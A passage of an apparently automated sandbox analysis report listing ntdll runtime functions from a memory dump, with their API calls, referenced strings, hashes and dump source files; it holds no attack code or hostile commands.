                                                                                                                            Similarity
                                                                                                                            • API ID: Lock$ReleaseShared$AcquireExclusive$DebugPrintTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 675604559-0
                                                                                                                            • Opcode ID: da703b580cf900a941333a293f98e928899581e3eac29e8e168bf891de69f96e
                                                                                                                            • Instruction ID: 1b957b4d9a45d144a41c4882b6f01a69c5fa16a0aca50730c26833fc14b18717
                                                                                                                            • Opcode Fuzzy Hash: da703b580cf900a941333a293f98e928899581e3eac29e8e168bf891de69f96e
                                                                                                                            • Instruction Fuzzy Hash: 0F515731E8420E9BCB00EF6AD8C079EB7F5AF453A4F154299D82CA7280C778E941CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B263F4D, Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlpEnsureBufferSize.1105(00000000,?,-00000002,6B2B0890,0000001C,6B23D659,00020000,00000000,?,?,00000003,00000000,00000002,?,00000040,?), ref: 6B263FB4
                                                                                                                            • memmove.1105(00000000,00000000,00000000,00000000,?,-00000002,6B2B0890,0000001C,6B23D659,00020000,00000000,?,?,00000003,00000000,00000002), ref: 6B263FD9
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C79A0,6B2B0890,0000001C,6B23D659,00020000,00000000,?,?,00000003,00000000,00000002,?,00000040,?,00000000,?), ref: 6B26401B
                                                                                                                            • RtlExpandEnvironmentStrings_U.1105(00000000,?,00000000,?,6B2B0890,0000001C,6B23D659,00020000,00000000,?,?,00000003,00000000,00000002,?,00000040), ref: 6B26402D
                                                                                                                            • RtlpEnsureBufferSize.1105(00000000,?,?,00000000,?,00000000,?,6B2B0890,0000001C,6B23D659,00020000,00000000,?,?,00000003,00000000), ref: 6B264074
                                                                                                                            • RtlExpandEnvironmentStrings_U.1105(00000000,?,?,00000000,00000000,?,?,00000000,?,00000000,?,6B2B0890,0000001C,6B23D659,00020000,00000000), ref: 6B2640A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: BufferEnsureEnvironmentExpandRtlpSizeStrings_$CriticalEnterSectionmemmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1067925741-0
                                                                                                                            • Opcode ID: 57338ce029b95dd99b9c550959a69cf1cd1c806fdeb638930358b6170f7a8be8
                                                                                                                            • Instruction ID: 69b5800174fe1c57991b7aade37eedb7a16708b58e29d4979fcaa083b14c1e8a
                                                                                                                            • Opcode Fuzzy Hash: 57338ce029b95dd99b9c550959a69cf1cd1c806fdeb638930358b6170f7a8be8
                                                                                                                            • Instruction Fuzzy Hash: 7E41B171D0453A9BC7248F6888D0BAAB7F4EF09B84F114566E864A7680F33D9D81CBE1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D5320, Relevance: 9.1, APIs: 6, Instructions: 91timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C85F0), ref: 6B1D5362
                                                                                                                            • RtlClearBits.1105(?,?,00000001,6B2C85F0), ref: 6B1D538E
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,?,00000001,6B2C85F0), ref: 6B1D53A7
                                                                                                                              • Part of subcall function 6B1F2280: RtlDllShutdownInProgress.1105(00000000), ref: 6B1F22BA
                                                                                                                              • Part of subcall function 6B1F2280: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6B1F23A3
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000001,6B2C85F0), ref: 6B1D53F2
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C85F0,6B2C85F0), ref: 6B1D5400
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,00000001,6B2C85F0), ref: 6B1D5422
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireRelease$AlertBitsClearDebugPrintProgressShutdownThreadTimesWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3225401293-0
                                                                                                                            • Opcode ID: 98ff2ac0b54efc789d724934ed76a1e4904325e8efb0a583f197cc3f77ed7875
                                                                                                                            • Instruction ID: fdd39cf577462e233409ea364d2ee08afa94216b60821827e8bf5a32f2adb34a
                                                                                                                            • Opcode Fuzzy Hash: 98ff2ac0b54efc789d724934ed76a1e4904325e8efb0a583f197cc3f77ed7875
                                                                                                                            • Instruction Fuzzy Hash: 26314672245345BFD700CF28C4C5EAAB3A4FF55305F4645ADEA514F242DB78E905CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20FE34, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAppendUnicodeToString.1105(02BE0000,?), ref: 6B20FEA6
                                                                                                                              • Part of subcall function 6B1EA990: memmove.1105(00000000,00000050,00000052,?,?,00000000,?,?,6B1EA448,?,\REGISTRY\USER\,?,02000000,?,?,000000FA), ref: 6B1EA9E2
                                                                                                                            • LdrStandardizeSystemPath.1105(02BE0000,02BE0000,?), ref: 6B20FEB4
                                                                                                                              • Part of subcall function 6B1EA8C0: RtlGetNtSystemRoot.1105(?,?), ref: 6B1EA8F0
                                                                                                                              • Part of subcall function 6B1EA8C0: RtlAppendUnicodeToString.1105(02140000,00000000,?,?), ref: 6B1EA8FD
                                                                                                                              • Part of subcall function 6B1EA8C0: RtlAppendUnicodeToString.1105(02140000,\SysWOW64,02140000,00000000,?,?), ref: 6B1EA915
                                                                                                                              • Part of subcall function 6B1EA8C0: RtlPrefixUnicodeString.1105(02140000,?,00000001,02140000,\SysWOW64,02140000,00000000,?,?), ref: 6B1EA924
                                                                                                                              • Part of subcall function 6B20FF2F: RtlGetNtSystemRoot.1105(?,?,?,?,?,6B20FEC6,02BE0000,02BE0000,?), ref: 6B20FF3C
                                                                                                                              • Part of subcall function 6B20FF2F: _wcsnicmp.1105(?,00000000,-00000002,?,?,?,?,?,6B20FEC6,02BE0000,02BE0000,?), ref: 6B20FF6E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$AppendSystem$Root$PathPrefixStandardize_wcsnicmpmemmove
                                                                                                                            • String ID: \Windows
                                                                                                                            • API String ID: 1616562977-3600636569
                                                                                                                            • Opcode ID: 1daa70ccc699444eb8bfc7cc53cbe148f4b7860055a70cb05803c4213a2532f1
                                                                                                                            • Instruction ID: 9e1d5555574b85c0d14c2d70c99c6fe86afe5bf11efab7225f4b01cef3297f26
                                                                                                                            • Opcode Fuzzy Hash: 1daa70ccc699444eb8bfc7cc53cbe148f4b7860055a70cb05803c4213a2532f1
                                                                                                                            • Instruction Fuzzy Hash: 7331A43290830A9FC714CF2CC4C594BB7E5BFC9714F01496AE898D7250EB38D909CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E0225, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B1E0315: memcpy.1105(6B2C7C54,?,00000040,00000000,00000000,000000FF,?,?,6B1E0254,6B2AF868,00000038,6B1DF563), ref: 6B1E0371
                                                                                                                              • Part of subcall function 6B1E0315: memcpy.1105(?,?,?,?,0000FFFF,?,00000000,00000000,000000FF,?,?,6B1E0254,6B2AF868,00000038,6B1DF563), ref: 6B1E042B
                                                                                                                            • RtlActivateActivationContextUnsafeFast.1105 ref: 6B1E02BA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$ActivateActivationContextFastUnsafe
                                                                                                                            • String ID: $$LdrpProcessDetachNode$Uninitializing DLL "%wZ" (Init routine: %p)$minkernel\ntdll\ldrsnap.c
                                                                                                                            • API String ID: 2422247448-1066784428
                                                                                                                            • Opcode ID: 560540e47bf503cb6ea8cf825b01b9d27f0bbce22389756611e423e6dc6dd9b5
                                                                                                                            • Instruction ID: b5122bbde47c9561324a03466902ed91dbd5a2aa780179616da1747b1778bfac
                                                                                                                            • Opcode Fuzzy Hash: 560540e47bf503cb6ea8cf825b01b9d27f0bbce22389756611e423e6dc6dd9b5
                                                                                                                            • Instruction Fuzzy Hash: 2C319371D41609EFDF06CF64C88AA9EBBF4BF09304F104099D401AB290DB7D9A43CB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B286243, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlpGetUserOrMachineUILanguage4NLS.1105(00000001,?,?,?), ref: 6B286275
                                                                                                                              • Part of subcall function 6B28CF70: RtlInitUnicodeString.1105(?,Control Panel\Desktop,?,?,?), ref: 6B28CFC1
                                                                                                                              • Part of subcall function 6B28CF70: ZwOpenKey.1105(00000007,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28D0B8
                                                                                                                              • Part of subcall function 6B28CF70: RtlInitUnicodeString.1105(?,PreferredUILanguages,00000007,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached), ref: 6B28D0CD
                                                                                                                              • Part of subcall function 6B28CF70: ZwClose.1105(?,?,?,?), ref: 6B28D139
                                                                                                                              • Part of subcall function 6B28CF70: ZwClose.1105(00000000,?,?,?), ref: 6B28D14E
                                                                                                                            • RtlInitUnicodeString.1105(?,?,00000001,?,?,?), ref: 6B2862A4
                                                                                                                            • RtlInitUnicodeString.1105(?,?,?,?,00000001,?,?,?), ref: 6B2862B7
                                                                                                                            • RtlCompareUnicodeString.1105(?,?,00000001,?,?,?,?,00000001,?,?,?), ref: 6B2862CC
                                                                                                                              • Part of subcall function 6B1E9660: RtlCompareUnicodeStrings.1105(?,?,?,?,6B2C7B60,?,6B2168BE,?,00000024,00000001,?,6B2005B9,?,?,6B2C7B60), ref: 6B1E9680
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Unicode$String$Init$CloseCompare$Language4MachineOpenRtlpStringsUser
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 3637150059-3372436214
                                                                                                                            • Opcode ID: 9d4672c695d3f3de15205c9ceb075f0cf6e625c8ab59713c901ec90a52940e4e
                                                                                                                            • Instruction ID: de105503e01373860d856f485fcc1b2d47cfe95c977128ce14bfecceb3f461c2
                                                                                                                            • Opcode Fuzzy Hash: 9d4672c695d3f3de15205c9ceb075f0cf6e625c8ab59713c901ec90a52940e4e
                                                                                                                            • Instruction Fuzzy Hash: 8511707190422C9AEB61DB619CC5FDAB3FCAF05304F0045EAD909D7184EB38AA48CB62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B26FDDA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT(?,00000000,FF676980,000000FF,00000000,00000000,?,?,?,6B22FA1C,00000000,00000004,?,00000000,?,00000000), ref: 6B26FDFA
                                                                                                                            • DbgPrintEx.1105(00000065,00000001,RTL: Enter CriticalSection Timeout (%I64u secs) %d,00000000,?,?,00000000,FF676980,000000FF,00000000,00000000,?,?,?,6B22FA1C,00000000), ref: 6B26FE0A
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u,?,?,00000002,?,00000000,00000004,?,00000000,?,00000000,00000000), ref: 6B26FE34
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 6B26FE2B
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 6B26FE01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                            • API String ID: 545360701-3903918235
                                                                                                                            • Opcode ID: 13acb9e59d7c97f049909c8f117026493616f787a4f0ff5c5b32cad18345b562
                                                                                                                            • Instruction ID: 7c95399d3d723f8fecf62024948db16de32b888688ca1a8f870a0d3bc5874296
                                                                                                                            • Opcode Fuzzy Hash: 13acb9e59d7c97f049909c8f117026493616f787a4f0ff5c5b32cad18345b562
                                                                                                                            • Instruction Fuzzy Hash: 33F0F632100505BFDA250A55DC86F23BF9AEB45770F140314F728565D1EB6AF87086F5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F3690, Relevance: 7.9, APIs: 5, Instructions: 359COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3d0cc9e42ded74dac0482e54304f4d9f3c39e2b519c3bff5927ab70e18121d32
                                                                                                                            • Instruction ID: aa201cc697353abda390edcf49e91902fb44dda08061d125919ec6d86ef09596
                                                                                                                            • Opcode Fuzzy Hash: 3d0cc9e42ded74dac0482e54304f4d9f3c39e2b519c3bff5927ab70e18121d32
                                                                                                                            • Instruction Fuzzy Hash: 6ED190B5D4422D8BDB20DFA8C1802EEB7F6FF44751F65415AD891AB388D338A883C791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1190, Relevance: 7.7, APIs: 5, Instructions: 151COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlIpv4StringToAddressW.1105(00000000,?,?,00000000), ref: 6B1D11B9
                                                                                                                              • Part of subcall function 6B1D11E0: iswctype.1105(0000000A,00000004), ref: 6B1D1244
                                                                                                                            • iswctype.1105(00000000,00000004,00000000,?,?,00000000), ref: 6B22EB6B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: iswctype$AddressIpv4String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1627499474-0
                                                                                                                            • Opcode ID: fb804841babf00360943d9f994b3b33d5c73eef6988bae1e53c25cbdaf3f4e98
                                                                                                                            • Instruction ID: 0dd2e7e1dd9b4822f4a0d5d4f766391c232b10f5cbfa4c9a30735b38b50aacf1
                                                                                                                            • Opcode Fuzzy Hash: fb804841babf00360943d9f994b3b33d5c73eef6988bae1e53c25cbdaf3f4e98
                                                                                                                            • Instruction Fuzzy Hash: 76414C36A1412AABE728D974DC81BBAB3F5FF00765F204566E441D73C0E73CDA51D250
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20F296, Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B20F2E0: RtlAcquireSRWLockExclusive.1105(6B2C86AC,00000000,00000000,00000000,0000000C,?,6B20F2BF,00000000,00000000,?), ref: 6B20F2F1
                                                                                                                              • Part of subcall function 6B20F2E0: RtlReleaseSRWLockExclusive.1105(6B2C86AC,?,?,6B2C86AC,00000000,00000000,00000000,0000000C,?,6B20F2BF,00000000,00000000,?), ref: 6B20F31B
                                                                                                                            • RtlAcquireSRWLockShared.1105(0000001C,00000000,00000000,?), ref: 6B24BB5B
                                                                                                                            • RtlReleaseSRWLockShared.1105(0000001C,0000001C,00000000,00000000,?), ref: 6B24BBE9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Lock$AcquireExclusiveReleaseShared
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3474408661-0
                                                                                                                            • Opcode ID: 3b2ff727f6a4553701c377bb56af938910fe8ec5efbd982b7e53c5b289f43de9
                                                                                                                            • Instruction ID: 4238dde0961190e02527805284385405aa18da6a68f9f563c75d186e703fe27f
                                                                                                                            • Opcode Fuzzy Hash: 3b2ff727f6a4553701c377bb56af938910fe8ec5efbd982b7e53c5b289f43de9
                                                                                                                            • Instruction Fuzzy Hash: 5C31E2759402189BCB14CF28C8C5BEEB7F4BF44708F1080A9DC49AB28ADB795A46CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2640D2, Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlComputePrivatizedDllName_U.1105(?,?,?,00000000,00000000,?,?,?,?,00000001), ref: 6B264104
                                                                                                                            • RtlFreeUnicodeString.1105(?,?,?,?,00000000,00000000,?,?,?,?,00000001), ref: 6B2641CF
                                                                                                                            • RtlFreeUnicodeString.1105(?,?,?,?,?,00000000,00000000,?,?,?,?,00000001), ref: 6B2641D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeStringUnicode$ComputeName_Privatized
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3871896386-0
                                                                                                                            • Opcode ID: 7f0ccbea32786f58c51fe4cf487af8eef5749277614f3754637beb9fa8debb0f
                                                                                                                            • Instruction ID: e56355b7a99dab3b80f483b71fe488647bf71f7f3bcf1b322fabbc6723ccadd9
                                                                                                                            • Opcode Fuzzy Hash: 7f0ccbea32786f58c51fe4cf487af8eef5749277614f3754637beb9fa8debb0f
                                                                                                                            • Instruction Fuzzy Hash: 3F317E7190011EEBCB10CFA4C8E2AAAB3F8EF15745F0045AAD8A4D7180F73DDA95CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FC4A0, Relevance: 7.6, APIs: 5, Instructions: 91timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,00000000,?,00000000,?,?,?,?,?,6B29C9F8,000000FE), ref: 6B1FC4E9
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?), ref: 6B1FC52D
                                                                                                                            • TpIsTimerSet.1105(?,?,?,00000000,?,00000000,?), ref: 6B1FC550
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,00000000,?), ref: 6B242E52
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,00000000,?,00000000,?), ref: 6B242E69
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$AcquireDebugPrintTimerTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1747049749-0
                                                                                                                            • Opcode ID: 65baba61593fae4448e63a94482132ff09877c2f06a9e3b97252673ff53bc329
                                                                                                                            • Instruction ID: 934624b8215d954a203e3f8416ee940a6abf46624682e87d292704be2be62f55
                                                                                                                            • Opcode Fuzzy Hash: 65baba61593fae4448e63a94482132ff09877c2f06a9e3b97252673ff53bc329
                                                                                                                            • Instruction Fuzzy Hash: 21210431B4420CBBCB008F758855AAF77FDAF47759F0484A9EC515B250DB39A906EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E0541, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?,000000AB,?,?,?,?,6B1E04FB,6B2AF890,0000001C,6B1E03A8,?,00000000), ref: 6B1E0569
                                                                                                                            • RtlInitUnicodeString.1105(?,VS_VERSION_INFO,00000020,0000005C,0000005C,00000010,00000000,00000010,?,00000001,?,00000010,?,00000010,?,00000010), ref: 6B1E06E7
                                                                                                                            • RtlCompareUnicodeString.1105(?,6B2AF890,00000000,6B1E03A8,?,VS_VERSION_INFO,00000020,0000005C,0000005C,00000010,00000000,00000010,?,00000001,?,00000010), ref: 6B1E0717
                                                                                                                              • Part of subcall function 6B1E9660: RtlCompareUnicodeStrings.1105(?,?,?,?,6B2C7B60,?,6B2168BE,?,00000024,00000001,?,6B2005B9,?,?,6B2C7B60), ref: 6B1E9680
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Unicode$CompareString$HeaderImageInitStrings
                                                                                                                            • String ID: VS_VERSION_INFO
                                                                                                                            • API String ID: 1271209012-1537192461
                                                                                                                            • Opcode ID: 349b7e17407164d622c2ff6bc8c19f40147ebd1218e04fbf3481258b43a5f772
                                                                                                                            • Instruction ID: a43e293a5f0232c3bb65eab70b7c837c27eb2590d4f0a8735e80a2a3fb07263f
                                                                                                                            • Opcode Fuzzy Hash: 349b7e17407164d622c2ff6bc8c19f40147ebd1218e04fbf3481258b43a5f772
                                                                                                                            • Instruction Fuzzy Hash: 2751D771E00615BAEB10CBB1CC56BAAB7B8AF54B44F144569E994EB1C0EF78D902CF70
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E43C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.1105(?,00000000,00000000,00000000,00000000,00000001), ref: 6B1E4424
                                                                                                                            • _wcsicmp.1105(MUI,?,00000000,00000000,00000001), ref: 6B1E44A9
                                                                                                                            • RtlLocaleNameToLcid.1105(?,?,00000003,00000000,00000000,00000001), ref: 6B1E4532
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LcidLocaleName_wcsicmpmemcpy
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 2548447388-1339004836
                                                                                                                            • Opcode ID: a14493a1c29e3113a62c370174c65539b0e557d5cff0f881fca578d1669fb7de
                                                                                                                            • Instruction ID: 308930c1df32cf4429c8d7f8358512423ea613d09fe2911daedc081fa11e2c7d
